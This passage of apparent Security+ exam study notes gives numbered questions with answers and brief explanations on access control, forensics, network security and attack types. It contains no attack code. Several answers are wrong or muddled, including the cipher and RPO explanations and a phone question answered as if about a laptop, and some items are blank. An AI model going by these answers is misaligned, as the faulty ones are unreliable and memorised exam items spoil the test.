believe your company has become infected with malware, and those machines were part of a larger
botnet. Which of the following BEST describes your company's infected computers?
A zombie is a computer connected to the internet that has been compromised by a hacker, computer
virus or trojan horse program and can be used to perform malicious tasks of one sort or another under
remote direction. Botnets of zombie computers are often used to spread email spam and launch denialof-service attacks (DoS attacks).
164. Upon further investigation, you determine that these devices are PLCs used to control the
hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for
these devices. Which of the following mitigations do you recommend?
The best recommendation is to conduct the logical or physical isolation of the elevator control system
from the rest of the production network and the internet. This should be done through the change
control process
165. Which of the following access control methods provides the most detailed and explicit type of
access control over a resource?
Attribute-based access control (ABAC) provides the most detailed and explicit type of access control
over a resource because it is capable of making access decisions based on a combination of subject and
object attributes, as well as context-sensitive or system-wide attributes.
166. Using the image provided, select four security features that you should use with a smart phone
provided through a COPE policy in your organization?
Cellular data, Remote wipe, Location tracking, and MDM are all appropriate security features to use
with a company-provided laptop.
167. You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to
begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the
following evidence should you capture first?
You should always begin the collection with the CPU registers and cache memory (L1/L2/L3/GPU). The
contents of system memory (RAM), including a routing table, ARP cache, process tables, kernel statistics,
and temporary file systems/swap space/virtual memory.
168. A macOS user is browsing the internet in Google Chrome when they see a notification that says
"Windows Enterprise Defender: Your computer is infected with a virus, please click here to remove it!"
What type of threat is this user experiencing?
Rogue anti-virus is a form of malicious software and internet fraud that misleads users into believing
there is a virus on their computer, and to pay money for a fake malware removal tool (that actually
introduces malware to the computer).
169. You are conducting an incident response and want to determine if any account-based indicators of
compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on
the server?
A malicious process is one that is running on a system and is outside the norm. This is a host-based
indicator of compromise (IOC) and is not directly associated with an account-based IOC.
170. Your organization requires the use of TLS or IPSec for all communications with an organization's
network. Which of the following is this an example of?
Data in transit (or data in motion) occurs whenever data is transmitted over a network.
171. Which of the following is NOT considered part of the Internet of Things?
Laptops.
172. A company needs to implement stronger authentication by adding an authentication factor to its
wireless system. The wireless system only supports WPA with pre-shared keys, but the backend
authentication system supports EAP and TTLS. What should the network administrator implement?
Since the backend uses a RADIUS server for back-end authentication, the network administrator can
install 802.1x using EAP with MSCHAPv2 for authentication.
173. You just received a notification that your company's email servers have been blacklisted due to
reports of spam originating from your domain. What information do you need to start investigating the
source of the spam emails?
You should first request a copy of one of the spam messages that include the full email header.
174. Which of the following is NOT a means of improving data validation and trust?
Decrypting data at rest does not improve data validation or trust since the data at rest could be
modified when decrypted.
175. Which protocol is paired with OAuth2 to provide authentication of users in a federated identity
management solution?
Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of
OAuth flows with precisely defined token fields.
176. Vulnerability scans must be conducted on a continuous basis in order to meet regulatory
compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity
analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information
Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the
analyst do next?
Filter the scan results to include only those items listed as critical in the asset inventory and remediate
those vulnerabilities first.
177. You are trying to find a rogue device on your wired network. Which of the following options would
NOT be helpful in finding the device?
War walking is conducted by walking around a build while trying to locate wireless networks and
devices. War walking will not help find a wired rogue device. Checking valid MAC addresses against a
known list, scanning for new systems or devices, and physically surveying for unexpected systems can be
used to find rogue devices on a wired network.
178. Which of the following tools could be used to detect unexpected output from an application being
managed or monitored?
A behavior-based analysis tool can be used to capture/analyze normal behavior and then alert when an
anomaly occurs. Configuring a behavior-based analysis tool requires more effort to properly set up, but
it requires less work and manual monitoring once it is running.
179. Janet, a defense contractor for the military, is performing an analysis of their enterprise network to
identify what type of work the Army would be unable to perform if the network were down for more
than a few days. Which of the following was Janet trying to identify?
Mission essential functions are things that must be performed by an organization to meet their mission.
For example, the Army being able to deploy its soldiers is a mission essential function. If they couldn't do
that because of a network server being offline, then that system would be considered a critical system
and should be priortized for higher security and better defenses.
180. Which of the following access control methods utilizes a set of organizational roles in which users
are assigned to gain permissions and access rights?
RBAC
181. When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the
contents of the hard drive during your analysis?
The primary purpose of a hardware write blocker is to intercept and prevent (or 'block') any modifying
command operation from ever reaching the storage device.
182. What kind of attack is an example of IP spoofing?
The man-in-the-middle attack intercepts communications between two systems.
183. You are configuring the ACL for the network perimeter firewall. You have just finished adding all the
proper allow and deny rules. What should you place at the end of your ACL rules?
include an implicit deny at the end of your ACL rules.
184. The digital certificate on the Dion Training web server is about to expire. Which of the following
should Jason submit to the CA in order to renew the server's certificate?
A CSR (certificate signing request) is what is submitted to the CA (certificate authority) to request a
digital certificate.
185. You have been asked to separate the corporate network into an administrative network (for
corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the
following technologies should you implement to achieve this goal?
VLAN is a type of network segmentation that is configured in your network switches that prevent
communications between different VLANs without using a router.
186. Which of the following IP addresses in the firewall logs would indicate a connection attempt from
an external source?
192.186.1.100, since it is not a private IP address.
187. https://test.diontraining.com/profile.php?userid=1546
https://test.diontraining.com/profile.php?userid=5482
https://test.diontraining.com/profile.php?userid=3618 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What type
of vulnerability does this website have?
Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application
developer uses an identifier for direct access to an internal implementation object but provides no
additional access control and/or authorization checks. In this scenario, an attacker could simply change
the userid number and directly access any user's profile page.
188. A cybersecurity analyst has received an alert that well-known call home messages are continuously
observed by sensors at their network boundary, but the organization's proxy firewall is properly
configured to successfully drop the messages prior to them leaving the network. Which of the following
is MOST likely the cause of the call home messages being sent?
An infected workstation is attempting to reach a command and control server
189. A cybersecurity analyst is working for a university that is conducting a big data medical research
project. The analyst is concerned about the possibility of an inadvertent release of PHI data. Which of
the following strategies should be used to prevent this?
The university should utilize a tokenization approach to prevent an inadvertent release of the PHI data.
190. A hardware security token like the one displayed creates a one-time use password by presenting
the user with a random string of numbers that changes every 30-60 seconds. When used by itself, it is
considered a one-time password authentication method.
191. Which of the following elements is LEAST likely to be included in an organization's data retention
policy?
Data classification would not be covered in the retention policy
192. Your company wants to provide a secure SSO solution for accessing both the corporate wireless
network and its network resources. Which of the following technologies should be used?
With RADIUS and SSO configured, users on the network can provide their user credentials one time
(when they initially connect to the wireless access point or another RADIUS client), and they are
automatically authenticated to all of the network's resources.
193. Jason has installed multiple virtual machines on a single physical server. He needs to ensure that
the traffic is logically separated between each virtual machine. How can Jason best implement this
requirement?
Configure a virtual switch on the physical server and create VLANs
194. Which of the following describes the overall accuracy of a biometric authentication system?
The Crossover Error Rate describes the overall accuracy of a biometric system.
195. A web developer wants to protect their new web application from a man-in-the-middle attack.
Which of the following controls would best prevent an attacker from stealing tokens stored in cookies?
Setting the secure attribute on the cookie
196. A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has
begun to approach full utilization at various times of the day. If the security team does not have
additional money in their budget to purchase a more capable collector, which of the following options
could they use to collect useful data?
enable sampling of the data collected.
197. A software assurance laboratory is performing a dynamic assessment on an application by
automatically generating random data sets and inputting them in an attempt to cause an error or failure
condition. Which of the following is the laboratory performing?
Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid,
unexpected, or random data as inputs to a computer program.
198. You were conducting a forensic analysis of an iPad backup and discovered that only some of the
information is contained within the backup file. Which of the following best explains why some of the
data is missing?
iPhone/iPad backups can be created as full or differential backups
199. You are working as a security administrator and need to respond to an ongoing spearphishing
campaign against your organization. Which of the following should be used as a checklist of actions to
perform in order to detect and resposd to this particular incident?
Playbook.
200. Ryan needs to verify the installation of a critical Windows patch on his organization's workstations.
Which method would be the most efficient to validate the current patch status for all of the
organization's Windows 10 workstations?
SCCM.
201. Christina is auditing the security procedures related to the use of a cloud-based online payment
service. She notices that the access permissions are set so that a single person can not add funds to the
account and transfer funds out of the account. What security principle is most closely related to this
scenario?
Separation of duties is the concept of having more than one person required to complete a task
202. A new smartphone supports the ability for users to transfer a photograph by simply placing their
phones near each other and "tapping" the two phones together. What type of technology does this
most likely rely on?
NFC, or near-field communication, is a set of communication protocols that enable two electronic
devices
203. Which authentication mechanism does 802.1x usually rely upon?
Extensible Authentication Protocol (EAP)
204. You have been asked to determine if Dion Training’s webserver is vulnerable to a recently
discovered attack on an older version of SSH. Which technique should you use to determine the current
version of SSH running on their web server?
Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting
the response from the webserver. This banner usually contains the operating system being run by the
server as well as the version number of the service (SSH) being run.
205. Which of the following authentication protocols was developed by Cisco to provide authentication,
authorization, and accounting services?
TACACS+ is an extension to TACACS (Terminal Access Controller Access Control System) and was
developed as a proprietary protocol by Cisco.
206. A corporate workstation was recently infected with malware. The malware was able to access the
workstation's credential store and steal all the usernames and passwords from the machine. Then, the
malware began to infect other workstations on the network using the usernames and passwords it stole
from the first workstation. The IT Director has directed its IT staff to come up with a plan to prevent this
type of issue from occurring again in the future. Which of the following would BEST prevent this from
reoccurring?
The only solution provided that could STOP this from reoccurring would be to use an anti-virus or antimalware solution with heuristic analysis.
207. On his way home, he forgot the laptop in an Uber, and a few days later, the data was posted on the
internet. Which of the following mitigations would have provided the greatest protection against this
data breach?
require data at rest encryption on all endpoints,
208. Which role validates the user’s identity when using SAML for authentication?
The IdP provides the validation of the user's identity.
209. You have been asked to recommend a capability to monitor all of the traffic entering and leaving
the corporate network's default gateway. Additionally, the company's CIO requests the ability to block
certain types of content before it leaves the network based on operational priorities. Which of the
following solution should you recommend to meet these requirements?
Due to the requirements provided, you should install a NIPS on the internal interface of the gateway
router and a firewall on the external interface of the gateway router. The firewall on the external
interface will allow the bulk of the malicious inbound traffic to be filtered prior to reaching the network.
Then, the NIPS can be used to conduct an inspection of the traffic entering the network and provide
protection for the network using signature-based or behavior-based analysis.
210. Syed is developing a vulnerability scanner program for a large network of sensors that are used to
monitor his company's transcontinental oil pipeline. What type of network is this?
SCADA
211. In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an
attacker to gain a privileged network position that would allow them to capture or modify data in an
SSL/TLS session. This was caused by poor programming in which a failed check of the connection would
exit the function too early. Based on this description, what is this an example of?
This is an example of an improper error handling vulnerability.
212. What technology is NOT PKI x.509 compliant and cannot be used in a variety of secure functions?
Blowfish. AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of
functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature
algorithm. SSL/TLS is used for the secure key exchange.
213. Users connecting to an SSID appear to be unable to authenticate to the captive portal. Which of the
following is the MOST likely cause of the issue?
Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for authentication.
214. Tim, a help desk technician, receives a call from a frantic executive who states that their companyissued smartphone was stolen during their lunch meeting with a rival company’s executive. Tim quickly
checks the MDM administration tool and identifies that the user’s smartphone is still communicating
with the MDM and displays the location of the device on a map. What should Tim do next to ensure the
data on the stolen device remains confidential and inaccessible to the thief?
perform a remote wipe of the device from the MDM
215. A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and devices
reply to spoofed IP (victim server), using up bandwidth and processing power.
216. Dion Training has contracted a software development firm to create a bulk file upload utility for its
website. During a requirements planning meeting, the developers asked what type of encryption is
required for the project. After some discussion, Jason decides that the file upload tool should use a
cipher that is capable of encrypting 8 bits of data at a time before transmitting the files from the web
developer’s workstation to the webserver. What of the following should be selected to meet this
security requirement?
A block cipher is used to encrypt multiple bits at a time prior to moving to the next set of data. Block
ciphers generally have a fixed-length block (8-bit, 16-bit, 32-bit, 64-bit, etc.). Stream ciphers encrypt a
single bit at a time during its encryption process.
217. Which of the following identity and access management controls relies upon using a certificatebased authentication mechanism?
Smart cards, PIV, and CAC devices are used as an identity and access management control. These
devices contain a digital certificate embedded within the smart card (PIV/CAC) that is presented to the
system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be
used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital
certificate to be presented to the system.
218. You have been asked to assist with an investigation into a malicious user's activities. Unfortunately,
your organization did not have full packet capture available for the time period of the suspected
activities. Instead, you have received netflow data that contains statistics and information about the
network traffic during that time period. Which of the following best represents the type of data you can
obtain from this netflow data to support the investigation?
Netflow is a flow analysis tool. Netflow does not capture the full packet capture of data as it crosses the
network sensor but instead captures metadata and statistics about the network traffic.
219. During your review of the firewall logs, you notice that an IP address from within your company’s
server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address
overnight each day. You have determined this has been occurring for approximately 5 days, and the
affected server has since been taken offline for forensic review. Which of the following is MOST likely to
increase the impact assessment of the incident?
PII of company employees and customers was exfiltrated
220. Which of the following security controls provides Windows system administrators with an efficient
way to deploy system configuration settings across a large number of devices?
GPO - Group Policy Object
221. Which of the following vulnerabilities is the greatest threat to data confidentiality?
An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using
this technique, the attacker could also alter the data and put it back, and nobody would notice
everything that had been changed, thereby also affecting our data integrity.
222. Jack is assessing the likelihood of reconnaissance activities being performed against his
organization. Which of the following would best classify the likelihood of a port scan being conducted
against his DMZ?
Since Jack's DMZ would contain systems and servers that are exposed to the internet, there is a high
likelihood that they are constantly being scanned by potential attackers performing reconnaissance.
223. You conducted a security scan and found that port 389 is being used when connecting to LDAP for
user authentication instead of port 636. The security scanning software recommends that you
remediate this by changing user authentication to port to 636 wherever technically possible. What
should you do?
you should change all devices and servers that can technically support the change to port 636, since
LDAP services over port 636 are encrypted by default.
224. You have been hired as a consultant to help Dion Training develop a new disaster recovery plan.
Dion Training has recently grown in the number of employees and information systems infrastructure
used to support its employees. Unfortunately, Dion Training does not currently have any
documentation, policies, or procedures for its student and faculty networks. What is the first action you
should take to assist them in developing a disaster recovery plan?
The first step to developing an effective disaster recovery plan is to identify the assets. It is imperative
that the organization understands exactly what assets they own and operate.
225. Dion Training has implemented a new mandatory vacation policy to help identify any malicious
insiders or employees. Which of the following control types would this policy be categorized?
Managerial or administrative controls are used to determine the way people act. These include policies,
procedures, and guidance. Mandatory vacation policies, job rotation policies, and separation of duties
policies are great examples of managerial controls.
226. What term describes the amount of risk an organization is willing to accept?
Risk appetite
227. A hacker successfully modified the sale price of items purchased through your company's web site.
During the investigation that followed, the security analyst has verified the web server, and the Oracle
database was not compromised directly. The analyst also found no attacks that could have caused this
during their log verification of the Intrusion Detection System (IDS). What is the most likely method that
the attacker used to change the sale price of the items purchased?
Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker
changed hidden form values to change the price of the items in the shopping cart
228.
229. Your email client has been acting strangely recently. Every time you open an email with an image
embedded within them, the image is not displayed to your screen. Which of the following is the MOST
likely cause of this issue?
This is a security setting in the mail client itself
230. A new corporate policy dictates that all access to network resources will be controlled based on the
user's job functions and tasks within the organization. For example, only people working in Human
Resources can access employee records, and only the people working in finance can access customer
payment histories. Which of the following security concepts is BEST described by this new policy?
Least privilege is the concept and practice of restricting access rights for users, accounts, and computing
processes to only those resources absolutely required to perform routine, legitimate activities.
231. The organization's vulnerabilty management team has rescanned the network and identified all the
machines missing this critical patch. These systems were then patched, and the network rescanned to
verify the patch was installed properly. Which of the following types of controls would you classify the
installation of this patch as?
A corrective control is one that responds to and fixes an incident.
232. You are conducting an intensive vulnerability scan to detect which ports might be open to
exploitation. During the scan, one of the network services becomes disabled and causes an impact on
the production server. Which of the following sources of information would provide you with the most
relevant information for you to use in determining which network service was interrupted and why?
The syslog server is a centralized log management solution
233. Which of the following terms is used to describe the period of the time taken to correct a fault so
that the system is restored to full operations after a failure or incident?
Mean time to repair (MTTR) is a measure of the time taken to correct a fault so that the system is
restored to full operation. MTTR is often used to descibe the average time to replace or recover a
system or product.
234. select four security features that you should use with a workstation or laptop within your
organization?
Host-based firewall, Network sniffer, a Cable lock, and CAT5e STP
235. Which of the following features is supported by Kerberos, but not by RADIUS and Diameter?
Kerberos uses a system of tickets to allow nodes to communicate over a non-secure network and prove
their identity in a secure manner.
236. Your home network is configured with a long, strong, and complex pre-shared key for its WPA2
encryption. You noticed that your wireless network has been running slow, so you checked the list of
"connected clients" and see that "Bob's Laptop" is connected to it. Bob lives downstairs and is the
maintenance man for your apartment building. You know that you never gave Bob your password, but
somehow he has figured out how to connect to your wireless network. Which of the following actions
should you take to prevent anyone from connecting to your wireless network without the WPA2
password?
WPS should be disabled on all wireless networks.
237. Which of the following access control models is the most flexible and allows the owner of the
resource to control the access permissions?
Discretionary access control (DAC) stresses the importance of the owner. The original creator of the
resource is considered the owner and can then assigned permissions and ownership to others.
238. Dion Training wants to implement a technology within their corporate network to BEST mitigate
the risk that a zero-day virus might infect their workstations. Which of the following should be
implemented FIRST?
Application whitelisting will only allow a program to execute if it is specifically listed in the approved
exception list. All other programs are blocked from running.
239.
240. Dion Training has performed an assessment as part of their disaster recovery planning. The
assessment found that the organization can only tolerate a maximum of 60 minutes worth of data loss
in the event of a disaster. Therefore, the organization has implemented a system of database snapshots
that are backed up every hour. Which of the following metrics would best represent this time period?
Recovery point objective (RPO) describes a period of time in which an enterprise's operations must be
restored following a disruptive event, e.g., a cyberattack, natural disaster or communications failure.
RPO is about how much data you afford to lose before it impacts business operations.
241. Which cloud computing concept is BEST described as focusing on the replacement of applications
and programs on a customer's workstation with cloud-based resources?
Software as a Service (SaaS) is used to provide web applications to end-users.
242. You are conducting a routine vulnerability scan of a server when you find a vulnerability. You locate
a patch for the vulnerability on the software vendor's website. What should you do next?
a Request for Change should be submitted.
243. Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is
used to support a virtual private network (VPN)?
IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN
security. Due to this, the use of PPTP and SSL for a VPN will likely alert during a vulnerability scan as an
issue to be remediated.
244. the analyst wants to remove any false positives before they begin to remediate the findings. Which
of the following is an indicator that something in their results would be a false positive?
Items classified by the system as Low or as For Informational Purposes Only
245. You are conducting an investigation on a suspected compromise. You have noticed several files that
you don't recognize. How can you quickly and effectively check if the files have been infected with
malware?
Submit the files to an open-source intelligence provider like VirusTotal
246. An organization is conducting a cybersecurity training exercise. Which team is Jason assigned if he
has been asked to monitor and manage the technical environment that is being used by the defenders
and attackers during the exercise?
White team.
247. Which of the following categories of controls are firewalls, intrusion detection systems, and a
RADIUS server classified as?
Technical controls.
248. Taylor needs to sanitize hard drives from some leased workstations that are being returned to a
supplier at the end of the lease period. The workstations' hard drives contained sensitive corporate
data. Which is the most appropriate choice to ensure that data exposure doesn’t occur during this
process?
Purging the drives, validating that the purge was effective, and documenting the sanitization
249. What is the lowest layer (bottom layer) of a bare-metal virtualization environment?
The bottom layer is physical hardware in this environment. It is what sits beneath the hypervisor and
controls access to guest operating systems. The bare-metal approach doesn’t have a host operating
system.
250. You want to play computer-based video games from anywhere in the world using your laptop or
tablet. You heard about a new product called a Shadow PC that is a virtualized Windows 10 Home
gaming PC in the cloud. Which of the following best describes this type of service?
Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based
service.
251. You are installing Windows 2016 on a rack-mounted server and want to host multiple virtual
machines within the physical server. You just finished the installation and now want to begin creating
and provisioning the virtual machines. Which of the following should you utilize to allow you to create
and provision the virtual machines?
A hypervisor, also known as a virtual machine monitor, is a process that creates and runs virtual
machines (VMs). A hypervisor allows one host computer to support multiple guest VMs by virtually
sharing its resources, like memory and processing.
252. DeepScan supports data-flow analysis and understands the execution flow of a program. It allows
you to see possible security flaws without executing the code. Which of the following types of tools
would DeepScan be classified as?
DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues
without actually running the code. Fuzzing is an automated software testing technique that involves
providing invalid, unexpected, or random data as inputs to a computer program through the use of a
fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create
a high-level source file that can be recompiled successfully. Fault injection is a testing technique that
aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and
fault injector are all dynamic analysis tools because they require the program being tested to be run in
order to be analyzed.
253. A client sends its authentication details to a key distribution center. What authentication protocol is
being implemented?
With Kerberos authentication, a client sends its authentication details not to the target server but to a
key distribution center (KDC). RADIUS is incorrect. Remote Authentication Dial-In User Service (RADIUS)
remote access control system provides authentication and access control in an enterprise network,
using UDP transport, to a central network access server. TACACS is incorrect because Terminal Access
Controller Access Control System Plus (TACACS+) takes a client/server model approach. It is similar to
RADIUS but uses TCP as a transport method; it uses port 49 as the default port. EAP-TLS is incorrect
because EAP-Transport Layer Security (EAP-TLS) uses certificate-based mutual authentication,
negotiation of the encryption method, and encrypted key determination between the client and the
authenticating server.
254. Cloud providers offer security groups, which are essentially virtual firewalls that authorize traffic to
and from the compute resources. Which statement is false regarding security groups?
traffic cannot be explicitly blocked; traffic can only be allowed with security groups.
1. A company is launching a new internal application that will not start until a username and
password is entered and a smart card is plugged into the computer. Which of the following BEST
describes this process?
Authentication - The process of proving who you say you are is authentication. In this example, the
password and smart card are two factors of authentication, and both reasonably prove that the
person logging in is authentic.
2. Sam, a security administrator, is configuring the authentication process used by technicians
when logging into a router. Instead of using accounts that are local to the router, Sam would like
to pass all login requests to a centralized database. Which of the following would be the BEST
way to implement this requirement?
The RADIUS (Remote Authentication Dial-In User Service) protocol is a common method of centralizing
authentication for users. Instead ofhaving separate local accounts on different devices, users can
authenticate with account information that is maintained in a centralized database.
3. A recent security audit has discovered email addresses and passwords located in a packet
capture. Which of the following did the audit identify?
An insecure protocol will transmit information "in the clear," or without any type of encryption or
protection.
4. A security administrator is designing a storage array that would maintain an exact replica of all
data without striping. The array needs to operate normally if a single drive was to fail. Which of
the following would be the BEST choice for this storage system?
RAID (Redundant Array of Independent Disks) type 1 maintains a mirror (or exact duplicate) of data
across multiple drives. If a single drive was to fail, the mirror would continue to operate with the
redundant data.
5. A transportation company has moved their reservation system to a cloud-based infrastructure.
The security manager would like to monitor data transfers, identify potential threats, and
ensure that all data transfers are encrypted. Which of the following would be the BEST choice
for these requirements?
A CASB (Cloud Access Security Broker) is used to implement and manage security policies when working
in a cloud-based environment.
6. A security administrator attends an annual industry convention with other security professionals
from around the world. Which of the following attacks would be MOST likely in this situation?
A watering hole attack infects a third-party visited by the intended victims. An industry convention
would be a perfect location to attack security professionals.
7. Sam, a security administrator, is configuring an IPsec tunnel to a remote site. Which protocol
should she enable to protect all of the data traversing the VPN tunnel?
The ESP (Encapsulation Security Payload) protocol encrypts the data that traverses the VPN.
8. A government transport service has installed access points that support WPA3. Which of the
following technologies would provide enhanced security for PSK while using WPA3?
SAE - WPA3 (Wi-Fi Protected Access 3) enhances the PSK (Pre-Shared Key) authentication process by
privately deriving session keys instead of sending the key hashes across the network.
9. Which of the following vulnerabilities would be the MOST significant security concern when
protecting against a competitor?
One of the easiest ways for a competitor to obtain information is through an existing Internet
connection. An unpatched server could be exploited to obtain customer data that would not normally
be available otherwise.
10. A third-party vulnerability scan reports that a company's web server software version is
susceptible to a memory leak vulnerability. Which of the following would be the expected result
if this vulnerability was exploited?
A DDoS (Distributed Denial of Service) can easily exploit a memory leak. Unused memory is not
properly released, and eventually the leak uses all available memory. The system eventually crashes due
to lack of resources.
11. Which of the following applies scientific principles to provide a post-event analysis of an
intrusion?
The diamond model was created by the United State intelligence community as a way to standardize
the attack reporting and the analysis of the intrusions.
12. Which of the following would be the MOST likely result of plaintext application communication?
To perform a replay attack, the attacker needs to capture the original non-encrypted content. If an
application is not using encrypted communication, the data capture process is a simple process for the
attacker.
13. A security administrator is updating the network infrastructure to support 802.1X
authentication. Which of the following would be the BEST choice for this configuration?
LDAP (Lightweight Directory Access Protocol) is a common protocol to use for centralized
authentication. Other protocols such as RADIUS, TACACS+, or Kerberos would also be valid options for
802.1X authentication.
14. Last month, a finance company disposed of seven-year-old printed customer account
summaries that were no longer required for auditing purposes. A recent online search has now
found that images of these documents are available as downloadable torrents. Which of the
following would MOST likely have prevented this information breach?
Pulping places the papers into a large washing tank to remove the ink, and the paper is broken down
into pulp and recycled. The information on the paper is not recoverable after pulping.
15. A security manager believes that an employee is using their laptop to circumvent the corporate
Internet security controls through the use of a cellular hotspot. Which of the following could be
used to validate this belief?
If the laptop is not communicating across the corporate network, then the only evidence of the traffic
would be contained on the laptop itself. A HIPS (Host-based Intrusion Prevention System) and hostbased firewall logs may contain information about recent traffic flows to systems outside of the
corporate network.
16.
The duplicate MAC (Media Access Control) address from 192.168.1.1 and 192.168.1.103 indicates MAC
spoofing or ARP (Address Resolution Protocol) poisoning. There should not be duplicate MAC
addresses associated with two IP addresses on the same subnet.
17. A security administrator has identified an internally developed application that allows users to
modify SQL queries through a web-based front-end. To prevent this modification, the
administrator has recommended that all queries be completely removed from the application
front-end and placed onto the back-end of the application server. Which of the following would
describe this implementation?
Stored procedures are SQL queries that execute on the server side instead of the client application. The
client application calls the stored procedure on the server, and this prevents the client from making any
changes to the actual SQL queries.
18. A security administrator is concerned that a user may have installed a rogue access point on the
corporate network. Which of the following could be used to confirm this suspicion?
A rogue access point would be difficult to identify once it’s on the network, but at some point the access
point would need to physically connect to the corporate network. An analysis of switch interface
activity would be able to identify any new devices and their MAC addresses.
19. A system administrator has installed a new firewall between the corporate user network and the
data center network. When the firewall is turned on with the default settings, users complain
that the application in the data center is no longer working. Which of the following would be the
BEST way to correct this application issue?
Create firewall rules that match the application traffic flow = By default, firewalls implicitly deny all
traffic. Firewall rules must be built that match the traffic flows, and only then will traffic pass through
the firewall.
20. A server administrator is building a new web server and needs to provide operating system
access to the web server executable. Which of the following account types should be
configured?
A service account is commonly used by local services on a system, but service accounts are not generally
enabled for interactive logins. Web servers, database servers, and other local servers use service
accounts.
21. Which of the following would be the MOST effective use of asymmetric encryption?
Securely derive a session key = The Diffie-Hellman process can combine public and private keys to
derive the same session key on both sides of a conversation without sending that session key across the
network.
22. Which of these protocols use TLS to provide secure communication?
TLS (Transport Layer Security) is a cryptographic protocol used to encrypt network communication.
HTTPS is the Hypertext Transfer Protocol over TLS, and FTPS is the File Transfer Protocol over TLS.
An earlier version of TLS is SSL (Secure Sockets Layer). Although we don’t commonly see SSL in use any
longer, you may see TLS communication referenced as SSL.
23. An IPS at your company has found a sharp increase in traffic from all-in-one printers. After
researching, your security team has found a vulnerability associated with these devices that
allows the device to be remotely controlled by a third-party. Which category would BEST
describe these devices?
An all-in-one printer that can print, scan, and fax is often categorized as an MFD (Multifunction Device).
24. Which of the following standards provides information on privacy and managing PII?
ISO 27701
25. Gateway Anti-Virus Alert: XPACK.A_7854 (Trojan) blocked
A download was blocked from a web server
26. Your connection is not private. NET::ERR_CERT_INVALID Which of the following attacks would
be the MOST likely reason for this message?
An on-path attack is often associated with a third-party who is actively intercepting network traffic. This
entity in the middle would not be able to provide a valid SSL certificate for a third-party website, and
this error would appear in the browser as a warning.
27. Which of the following would be the BEST way to provide a website login using existing
credentials from a third-party site? – Federation; Federation would allow members of one
organization to authenticate using the credentials of another organization.
28. A security administrator has been using EAP-FAST wireless authentication since the migration
from WEP to WPA2. The company’s network team now needs to support additional
authentication protocols inside of an encrypted tunnel. Which of the following would meet the
network team’s requirements?
EAP-TTLS (Extensible Authentication Protocol - Tunneled Transport Layer Security) allows the use of
multiple authentication protocols transported inside of an encrypted TLS (Transport Layer Security)
tunnel. This allows the use of any authentication while maintaining confidentiality with TLS.
29. Which of the following would be commonly provided by a CASB?
A list of applications in use & Verification of encrypted data transfers
30. A company would like to protect the data stored on laptops used in the field. Which of the
following would be the BEST choice for this requirement?
SED (Self encrypting drive)
31. A network administrator would like each user to authenticate with their personal username and
password when connecting to the company's wireless network. Which of the following should
the network administrator configure on the wireless access points?
802.1X uses a centralized authentication server, and all users can use their normal credentials to
authenticate to an 802.1X network.
32. A manufacturing company has moved an inventory application from their internal systems to a
PaaS service. Which of the following would be the BEST way to manage security policies on this
new service?
A CASB (Cloud Access Security Broker) is used to manage compliance with security policies when using
cloud-based applications.
33. A security administrator needs to identify all references to a Javascript file in the HTML of a
web page. Which of the following tools should be used to view the source of the web page and search
through the file for a specific filename?
Grep & curl
33. A security administrator is collecting information associated with a ransomware infection on the
company's web servers. Which of the following log files would provide information regarding
the memory contents of these servers?
Dump - A dump file contains the contents of system memory. In Windows,
this file can be created from the Task Manager.
34. Which part of the PC startup process verifies the digital signature of the OS kernel? Trusted
Boot
35. Which of the following would be the BEST way to confirm the secure baseline of a deployed
application instance?
An integrity measurement is designed to check for the secure baseline of firewall settings, patch levels,
operating system versions, and any other security components associated with the application. These
secure baselines may vary between different application versions.
36. A security administrator is designing an authentication process for a new remote site
deployment. They would like the users to provide their credentials when they authenticate in
the morning, and they do not want any additional authentication requests to appear during the
rest of the day. Which of the following should be used to meet this requirement?
Kerberos uses a ticket-based system to provide SSO (Single Sign-On) functionality. You only need to
authenticate once with Kerberos to gain access to multiple resources.
37. An MSP is designing a new server room for a large company. Which of the following should be
included in the design to provide redundancy?
RAID (Redundant Array of Independent Disks) and dual power supplies can both provide uptime and
availability if a drive or component fails. Many RAID configurations can continue to operate if a drive
fails, and a system with two power supplies can continue to operate if one of those was to fail.
38. An organization maintains a large database of customer information for sales tracking and
customer support. Which person in the organization would be responsible for managing the
access rights to this data?
The data custodian manages access rights and sets security controls to the data.
39. A corporate security team would like to consolidate and protect the certificates across all of
their web servers. Which of these would be the BEST way to securely store these certificates?
An HSM (Hardware Security Module) is a high-end cryptographic hardware appliance that can securely
store keys and certificates for all devices.
40. A security manager has created a report showing intermittent network communication
from external IP addresses to certain workstations on the internal network. These
traffic patterns occur at random times during the day. Which of the following would be
the MOST likely reason for these traffic patterns?
A backdoor would allow an attacker to access a system at any time without any user intervention. If
there are inbound traffic flows that cannot be identified, it may be necessary to isolate that computer
and examine it for signs of a compromised system.
41. A company's outgoing email server currently uses SMTP with no encryption. The security
administrator would like to implement encryption between email clients without changing the
existings erver-to-server communication. Which of the following would be the BEST way to
implement this requirement?
